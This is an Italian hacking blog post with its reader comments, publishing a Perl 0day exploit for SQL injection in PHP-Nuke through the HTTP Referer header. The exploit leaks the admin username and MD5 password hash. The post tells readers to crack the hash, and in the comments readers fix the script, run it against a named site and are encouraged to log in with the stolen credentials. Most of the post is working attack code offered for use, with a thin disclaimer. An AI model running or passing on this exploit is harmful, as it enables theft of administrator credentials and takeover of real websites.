PHP-Nuke Http Referers Remote SQL-Injection Exploit (NON FIXATA)

Un pericoloso bug affligge tutte le versioni di PHP-NUKE, il bug sottostante è nell’index.php, dopo aver fatto girare il nostro exploit, il blocco referenti ci mostrerà il l’user e la password dell’admin criptata in hash md5. Successivamente non vi resta che usare il cracker md5 di Milw0rm per crackare la password.

$db->sql_query(”INSERT INTO “.$prefix.”_referer VALUES (NULL, ‘”.$referer.”‘)”)

Questa è una 0day, non è ancora stata fixata, l’unico consiglio che posso dare ai meno esperti è quello di togliere il blocco referenti, invece chi è pratico di PHP con poche modifiche al codice può tappare questa enorme falla.

Codice exploit:

#!/usr/bin/perl
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#Screenshot:
#0day exploit for PHP-nuke <=8.0 Final
#Sql injection attack in INSERT syntax
#version, when 'HTTP Referers' block is on
#Coded by:Maciej `krasza` Kukla[krasza@gmail.com]
#
#[+]You can see login and hash on web page in 'HTTP referers' block
#[+]Exploit successed
use strict;
use warnings;
use LWP;
my $adres=shift or help()
my $ua = LWP::UserAgent->new;
my $zadanie = HTTP::Request->new(GET => $adres)
my ($respone,$referer)
banner()
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `pwd` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die "$adres : ",$respone->message,"\n";
$referer="http://www.krasza.int.pl'),(NULL,(SELECT `aid` FROM `nuke_authors` WHERE `radminsuper`=1))/*";
$zadanie->referer($referer)
$respone=$ua->request($zadanie)
$respone->is_success or die "$adres : ",$respone->message,"\n";
print "[+]You can see login and hash on web page in 'HTTP referers' block\n";
print "[+]Exploit successed\n";
sub banner{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n\n";
}
sub help{
print "0day exploit for PHP-nuke <=8.0 Final\n";
print "Sql injection attack in INSERT syntax\n";
print "version, when 'HTTP Referers' block is on\n";
print "Coded by:Maciej `krasza` Kukla[krasza\@gmail.com]\n";
print "Use:\n";
print "\tperl exploit.pl [url]\n";
print "\t[url]-vicitim webpage with index.php\n";
print "Example:\n";
print "\tperl exploit.pl http://phpnuke.org/index.php\n";
exit(0)
}

Happy Testing!😉

24 Responses to “PHP-Nuke Http Referers Remote SQL-Injection Exploit (NON FIXATA)”


  1. 1 gias 27, luglio, 2007 alle 3:51 pm

    ma come si usaa???cioè la devo salvare in che formato?
    e poi cm la uso???n

  2. 2 underground0 27, luglio, 2007 alle 5:50 pm

    Vedi le prime exploit postate da me… ci sta tutto!😉

  3. 3 r080cy90r 7, agosto, 2007 alle 1:29 am

    IO ed evilsocket tempo abbiamo fatto un videotutorial su come utilizzare questo exploit lo trovate qui:
    http://www.rbt-4.net/forum/viewthream_id=37&thread_id=360
    BUONA VISIONE!

  4. 4 Perl 27, agosto, 2007 alle 2:41 pm

    Ciao, si deve compliare ed eseguiore in perl?

  5. 5 underground0 22, settembre, 2007 alle 10:50 pm

    si compila con Active Perl, lo devi salvare con estenzione .pl

  6. 6 Help_Please 8, novembre, 2007 alle 1:15 pm

    Salve Gente… Ho provato a lanciare l’exploit ma mi da il seguente errore…

    C:\Users\Nuanda97>perl C:\Users\Nuanda97\Desktop\H4cK3R\exploit.pl http://sdb.il
    bello.com/index.php/
    Semicolon seems to be missing at C:\Users\Nuanda97\Desktop\H4cK3R\exploit.pl lin
    e 20.
    Scalar found where operator expected at C:\Users\Nuanda97\Desktop\H4cK3R\exploit
    .pl line 22, near “)
    $referer”
    (Missing semicolon on previous line?)
    syntax error at C:\Users\Nuanda97\Desktop\H4cK3R\exploit.pl line 18, near “)
    my ”
    Global symbol “$ua” requires explicit package name at C:\Users\Nuanda97\Desktop\
    H4cK3R\exploit.pl line 18.
    syntax error at C:\Users\Nuanda97\Desktop\H4cK3R\exploit.pl line 20, near “)
    my ”
    Global symbol “$respone” requires explicit package name at C:\Users\Nuanda97\Des
    ktop\H4cK3R\exploit.pl line 20.
    Global symbol “$referer” requires explicit package name at C:\Users\Nuanda97\Des
    ktop\H4cK3R\exploit.pl line 20.
    Global symbol “$referer” requires explicit package name at C:\Users\Nuanda97\Des
    ktop\H4cK3R\exploit.pl line 22.
    Unrecognized character \x81 at C:\Users\Nuanda97\Desktop\H4cK3R\exploit.pl line
    22.

    Grazie in anticipo.

  7. 7 underground0 8, novembre, 2007 alle 1:24 pm

    il codice contiene errori per evitare l’uso spropositato a gente che non ne sa n’accidente e li usa per fare danni!
    Quindi studia e correggiti l’errore da solo!😀

    P.S: sai che postando quell’errore dichairi pubblicamente che hai tendato di attaccare il sito “http://sdb.ilbello.com”.(riflettete prima di fare le cose!😉 Byez

  8. 8 Help_Please 8, novembre, 2007 alle 2:04 pm

    aaaaaaa grazie… cmq non ti preocc quel sito fa parte di un hacker game… è un sito creato apposta per essere bacato… cmq grazie ciauz

  9. 9 Napster 25, novembre, 2007 alle 9:04 pm

    Ciao senti ho trovato gli errori e li ho corretti…;-) ma dove lo vedo il blocco referenti di http://www.sdb.ilbello.com???
    Ti prego risp!

  10. 10 Napster_need hepl!!! 26, novembre, 2007 alle 12:04 pm

    C:\Perl\bin>perl exploit.pl http://sdb.ilbello.com/index.php
    0day exploit for PHP-nuke <=8.0 Final
    Sql injection attack in INSERT syntax
    version, when ‘HTTP Referers’ block is on
    Coded by:Maciej `krasza` Kukla[krasza@gmail.com]

    [+]You can see login and hash on web page in ‘HTTP referers’ block
    [+]Exploit successed

    OK ma dove lo vedo il blocco HTTP referes???
    Vi prego qualcuno mi aiuto ci ho messo mesi a trovare gli errori… nn mi voglio fermare qui!
    Grazie in anticipo…

  11. 11 underground0 26, novembre, 2007 alle 1:14 pm

    @Napster_need help!!!:
    l’http referers è un blocco di php-nuke che contiene dei link esterni al sito! Molti conoscendo questa falla tutt’ora non fixata evitano di mettere il blocco eliminando ogni rischio quindi è molto probabile che non sia presente! Ciao

  12. 12 Napster 26, novembre, 2007 alle 1:55 pm

    me ne sono accorto da solo😀. Grazie x l’aiuto underground0 complimenti x il sito sempre aggiornato!!!

  13. 13 underground0 26, novembre, 2007 alle 1:59 pm

    @Napster: ottimo!😀 Figurati dovere! Grazie per i complimenti!😉

  14. 14 Napster 12, dicembre, 2007 alle 3:30 pm

    Scusa se sono di nuovo all’ attacco ma i link esterni al sito? spiegati meglio x favore… io nn sono tanto pratico e so giusto qualcosa sugli exploit… sto cercando i dati di http://www.sdb.ilbello.com ma dv è il blocco referenti?

  15. 15 underground0 12, dicembre, 2007 alle 4:15 pm

    @Napster: ho fatto una foto allo schermo subito dopo aver fatto girare l’exploit, ho incorniciato il blocco referenti con gli hash md5 in rosso. Comunque ti consiglio di studiare prima di lanciare exploit a destra e a manca senza sapere come funzionano. Byez😉

  16. 16 Napster 17, dicembre, 2007 alle 3:48 pm

    Ok fino a lì c’ero arrivato ma quando lancio l’exploit contro il sito appare parte dell’ md5 21232f297a57a5a743894a0e4a801fc3 che crakkata è … bn se ci clikki sopra ti porta al link http://www.sdb.ilbello.com/admin che è una pagina vuota è solo questo che mi ha confuso.
    Suppongo che il cratore del gioco (KinG-LioN) abbia in parte fixato il bug infatti su alri siti cliccandoci sopra porta a una pagina di errore con l’md5.
    Poi gli exploit ho da poco imparato qualcosina sul perl e sul slq (quanto basta x trovare gli errori) e non li lancio a destra e a manca, è solo questo fatto che mi aveva confuso.
    Grazie cmq

    PS: Ho cercato invano sul tuo sito e su google un exploit x fare un slq sul modulo top10. Tu me ne sai consigliare qualcuna?

    Grazie

  17. 17 underground0 19, dicembre, 2007 alle 1:44 pm

    @Napster: il primo hash è il nick dell’admin il secondo la sua password, hai provato ad accedere con quei dati????

    Beh non ti arrendere se non è percorribile questa strada prendine un altra!😉

    PS: Mi dispiace non ne conosco nessuna!🙂

  18. 18 Napster 19, dicembre, 2007 alle 10:26 pm

    OK grzie mille… il tuo blog è una miniera di info sempre aggiornato!
    Ciao alla prssima!

  19. 19 Gianni 29, gennaio, 2008 alle 1:36 am

    Ciao io sono alle prese con il gioco in discussione ma sono un principiante di queste cose potreste darmi una grande aiuto spiegandomi come dovrei fare a risolvere il crak di quella pagina ?

  20. 20 Spid3r 7, maggio, 2008 alle 7:48 pm

    che lameri🙂

  21. 21 Monster871 15, maggio, 2008 alle 9:00 pm

    Ciao vorrei sapere se qll exploit come si usa , perche non so bene il perl!!! :d ma so aiout , e html LOl

  22. 22 Monster871 22, maggio, 2008 alle 8:26 pm

    scusate ql messaggio a sbaglaito a scriverlo un mio amico col mio nome cmq vorrei sapere ma dp aver lanciato exploit dovrei andare negli utimi utenti e trovare un hash in md5 giusto?

  23. 23 mr_red 23, agosto, 2008 alle 8:03 pm

    io avvio l’exploit (penso di averlo corretto tutto perchè parte senza dare errore) ma anche dopo mezz’ora nel campo password non compare niente…cosa devo fare???
    come faccio a vedere tutto l’md5 che è nei refers…penso che non basti quello chè c’è con i puntini

  24. 24 mr_red 23, agosto, 2008 alle 8:19 pm

    no scusate avevo sbagliato una cosa sulla correzione…ora però ho un altra domanda
    dove posso vedere l’intero codice md5…perche nel blocco referers (anche in quello della foto) ce n’è un pezzo poi ci sono i puntini
    come faccio a prenderlo tutto


Comments are currently closed.



Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,049,926 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

luglio: 2007
L M M G V S D
« Giu   Set »
 1
2345678
9101112131415
16171819202122
23242526272829
3031